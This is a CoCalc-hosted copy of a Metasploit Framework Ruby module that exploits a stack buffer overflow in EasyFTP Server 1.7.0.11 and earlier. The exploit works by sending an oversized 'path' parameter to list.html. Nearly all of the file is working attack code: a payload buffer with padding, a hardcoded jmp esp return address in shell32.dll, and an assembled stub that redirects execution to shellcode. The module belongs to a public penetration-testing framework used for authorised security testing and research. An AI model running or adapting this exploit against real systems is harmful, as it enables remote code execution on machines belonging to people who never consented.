Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/easyftp_list.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }

10


11
  include Msf::Exploit::Remote::HttpClient

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'EasyFTP Server list.html path Stack Buffer Overflow',

18
        'Description' => %q{

19
          This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11

20
          and earlier. EasyFTP fails to check input size when parsing the 'path' parameter

21
          supplied to an HTTP GET request, which leads to a stack based buffer overflow.

22
          EasyFTP allows anonymous access by default; valid credentials are typically

23
          unnecessary to exploit this vulnerability.

24


25
          After version 1.7.0.12, this package was renamed "UplusFtp".

26


27
          Due to limited space, as well as difficulties using an egghunter, the use of

28
          staged, ORD, and/or shell payloads is recommended.

29
        },

30
        'Author' => [

31
          'ThE g0bL!N', # Original exploit [see References]

32
          'jduck' # Metasploit re-implementation

33
        ],

34
        'References' => [

35
          [ 'OSVDB', '66614'],

36
          [ 'EDB', '11500' ]

37
        ],

38
        'DefaultOptions' => {

39
          'EXITFUNC' => 'thread'

40
        },

41
        'Privileged' => true,

42
        'Payload' => {

43
          'Space' => 256,

44
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",

45
          'Compat' =>

46
            {

47
              'ConnectionType' => '+ws2ord',

48
            },

49
        },

50
        'Platform' => 'win',

51
        'Targets' => [

52
          [

53
            'Windows XP SP3 - Easy FTP Server Universal',

54
            # NOTE: It's not possible to use addresses within the

55
            # binary due to the nul byte.

56
            {

57
              'Ret' => 0x7cc5d507 # jmp esp in shell32.dll

58
              # 'Ret'      => 0xdeadbeef

59
            }

60
          ]

61
        ],

62
        'DefaultTarget' => 0,

63
        'DisclosureDate' => '2010-02-18',

64
        'Notes' => {

65
          'Reliability' => UNKNOWN_RELIABILITY,

66
          'Stability' => UNKNOWN_STABILITY,

67
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

68
        }

69
      )

70
    )

71


72
    register_options(

73
      [

74
        Opt::RPORT(8080),

75
        OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),

76
        OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', '[email protected]'])

77
      ]

78
    )

79
  end

80


81
  def check

82
    info = http_fingerprint # check method

83
    if info and (info =~ /Easy\-Web Server\//)

84
      return Exploit::CheckCode::Detected

85
    end

86


87
    Exploit::CheckCode::Safe

88
  end

89


90
  def exploit

91
    if (payload.encoded.length > payload_space)

92
      fail_with(Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")

93
    end

94


95
    # Fix up ESP, jmp to the beginning of the buffer

96
    stub_asm = %q{

97
      mov edi, esp

98
      add esp, 0xfffffc04

99
      add edi, 0xfffffee8

100
      jmp edi

101
    }

102
    stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string

103


104
    # Build the path up

105
    path = ''

106
    path << payload.encoded

107
    path << rand_text(268 - path.length)

108
    # NOTE: It's possible to overwrite SEH, however SafeSEH is in effect.

109
    path << [target.ret].pack('V')

110
    path << rand_text(280 - path.length)

111
    path << stub

112
    path << rand_text(332 - path.length)

113


114
    uri = "/list.html?path="

115
    uri << path

116


117
    print_status("Trying target #{target.name}...")

118
    res = send_request_raw({ 'uri' => uri }, 5)

119


120
    if (res)

121
      print_error("The server unexpectedly responded, this is not good.")

122
      print_status(res.to_s)

123
    end

124


125
    handler

126
  end

127
end

128


129